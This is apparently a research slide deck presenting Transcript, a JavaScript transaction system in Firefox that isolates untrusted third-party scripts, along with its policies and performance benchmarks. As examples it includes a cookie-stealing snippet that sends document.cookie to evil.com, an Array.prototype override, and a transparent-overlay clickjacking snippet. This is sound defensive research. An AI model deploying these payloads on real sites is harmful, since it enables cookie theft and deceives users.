The Case for JavaScript Transactions

Enhancing JavaScript with Transactions
Mohan Dhawan†, Chung-chieh Shan‡ and Vinod Ganapathy†
†Department of Computer Science, Rutgers University
‡School of Informatics and Computing, Indiana University
Problem

Web applications include third party content
  Examples: widgets, advertisements, libraries
  May contain untrusted, malicious JavaScript
Example from nytimes.com
  Rogue third party advertisement
  Displayed image of fake virus scan
  Client security and privacy at risk
Solution: Transcript

Extend JavaScript to support Transactions
  Execute untrusted content speculatively
  Commit changes after policy enforcement
[Figure: a Transaction block nested inside the Web Application]
Goal

Protect the Web application from security violating actions of untrusted JavaScript
Must handle arbitrary third party code written in JavaScript
  Including constructs such as eval, this, with
Must enforce powerful security policies
  Allow pop-ups from white-listed websites only
  Disallow innerHTML in the context of the host Web application
Contributions

JavaScript transactions
  Speculative execution of unmodified third party JavaScript code
Transaction suspend/resume
  Allow the host Web application to mediate external actions like DOM and AJAX operations
Speculative DOM updates
Schematic use of Transcript

// Web application code
var tx = transaction{
  ...
  // unmodified 3rd party code
  ...
};
// Introspection block goes below
/* policy enforcement code */
// validate actions of the transaction
tx.commit();
// Rest of the Web application code
Example: Untrusted code

// Web application code
var tx = transaction{
  var image = document.createElement("img");
  var url = "http://evil.com/grabcookie.php";
  var params = document.cookie;
  image.src = url + "?cookie=" + params;
  document.body.appendChild(image);
  ...
  Array.prototype.join = function() { return "evilString"; };
};
Transcript Runtime

Transcript runtime system

// Web application code
…
tx = transaction {            // (1) transaction starts
  ...
  body.appendChild(image);    // (2) external action: the transaction suspends
  ...
};
// Introspection block
do {                          // (3) host inspects the suspended transaction
  ...
  tx = tx.resume();           // (4) transaction resumes
  ...
} while(tx.isSuspended());
tx.commit();                  // (5) commit
…
// Rest of the Web application   (6)

[Figure: the Transcript runtime. The web app owns DOMorig and Heaporig; the Transaction object tx holds the 3rd-party DOM clone (DOMTX), the TX call stack and the R/W sets; after resume, DOM'TX contains the appended image.]

Transcript clones the host's web DOM when the transaction starts.
On a transaction suspend, the Transcript runtime saves (i) the tx's read and write sets, (ii) the speculative DOM, and (iii) the stack frames up to the nearest transaction delimiter, to create a new Transaction object.
In the introspection block, the host performs the action (appendChild) on behalf of the guest.
The Transcript runtime loads the saved read and write sets and stack frames when the transaction resumes.

March 19, 2016
Transaction suspend and resume

var tx = transaction{
  ...
  document.body.appendChild(image);
};
do {
  var rs = tx.getReadSet(), arg = tx.getArgs();
  switch(tx.getCause()) {
    case "appendChild":
      // Policy: an IMG may be attached unless the guest has read document.cookie
      if (!(arg[0].nodeName.match("IMG") && rs.checkMembership(document, "cookie")))
        obj.appendChild(arg[0]);   // obj: the node the guest called appendChild on
      break;
  } /* end switch */
  tx = tx.resume();
} while(tx.isSuspended());
Read and Write Sets

var tx = transaction{
  ...
  Array.prototype.join = function() { return "evilString"; };
};
/* Introspection Code */
var ws = tx.getWriteSet();
// Policy: refuse to commit if the guest wrote to any property of Array.prototype
if (ws.checkMembership(Array.prototype, "*")) {
  to_commit = false;
}
// Rest of the web application code
Gluing

var tx = transaction{
  ...
  document.write('<script src="newcode.js"></s' + 'cript>');
};
// Introspection block
// Rest of the web application code

The script tag is glued together from string fragments at run time, so the runtime must inspect the string actually passed to document.write rather than the guest's source text.
Implementation

Prototype implementation in Firefox 3.7a4
Added new JavaScript features
  transaction keyword and Transaction object
Modified SpiderMonkey op-codes to
  Log all object accesses
  Suspend on DOM / AJAX calls
Added speculative execution support for DOM operations
  Re-direct all node accesses to the cloned copy
Evaluation

Goals
  Study applicability of Transcript in isolating real guest code
  Measure performance impact on guest code and microbenchmarks
  Demonstrate graceful recovery in presence of malicious and buggy guests
Methodology
  Isolated the guest code in a Web application using transactions
  Introspection block for each transaction enforced a number of general and domain specific policies
Applicability of Transcript

Applied Transcript on five JavaScript widgets and applications
  Stand-alone and library based

Benchmark         Policy
JS Menu           No network or cookie access
Picture Puzzle    Disallow attaching key event handlers
Spell Checker     No XMLHttpRequest if cookies were read
GreyBox           iframes to whitelisted URLs only
Color Picker      No innerHTML in host's context

No difference in behavior and functionality
Performance - Application benchmarks

[Chart: application benchmark overhead; overhead = 0.16s]
Performance – Microbenchmarks (Function calls)

Microbenchmark                                  Overhead
Native functions
  eval("if (true) true; false;")                6.87x
  fn.call(this, i)                              1.89x
External operations
  getElementById("checkbox")                    6.78x
  createElement("div")                          3.69x
  addEventListener("click", clk, false)         26.51x
  dispatchEvent(evt)                            1.20x
  document.write("<script>x = 1;</script>")     2.01x
  document.write("<b> Hi </b>")                 1.26x
Performance – Microbenchmarks (JavaScript Events)

Event name                         Normalized overhead   Raw delay (µs)
Drag event (drag)                  1.71x                 97
Keyboard event (keypress)          1.16x                 150
Message event (message)            1.17x                 85
Mouse event (click)                1.54x                 86
Mouse event (mouseover)            2.05x                 88
Mutation event (DOMAttrModified)   2.14x                 88
UI Event (overflow)                1.97x                 61

Average overhead of just 94 µs per event.
Recovery

Clickjacking
document.write('<div style="z-index:-1; ...other size/loc params"> <a href="http://www.amazon.com"> Goto Amazon </a> </div>');
...
document.write('<div style="opacity: 0.0; z-index:0; ...same size/loc params"> <a href="http://evil.com"> Goto Amazon </a> </div>');

The second, fully transparent div is stacked above the visible one with the same size and position, so a click on what looks like the Amazon link actually follows the link to evil.com.
Related Work

Staged information flow in JavaScript: PLDI'09
  hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
Conscript: S&P'10
  aspect-oriented framework to specify and enforce fine-grained security policies for Web applications
AdJail: Security'10
  isolation mechanism to protect Web application content from malicious advertisements
Caja, FBJS, AdSafe, etc.
Conclusion

Transcript implements JavaScript transactions to provide isolation and recovery
  Suspend operations that break isolation
  Resume the operation if the web application allows it
Enforcement of powerful security policies
  All data reads / writes are recorded
  Ability to inspect reads / writes before commit
No restriction or changes to third party code

Questions ?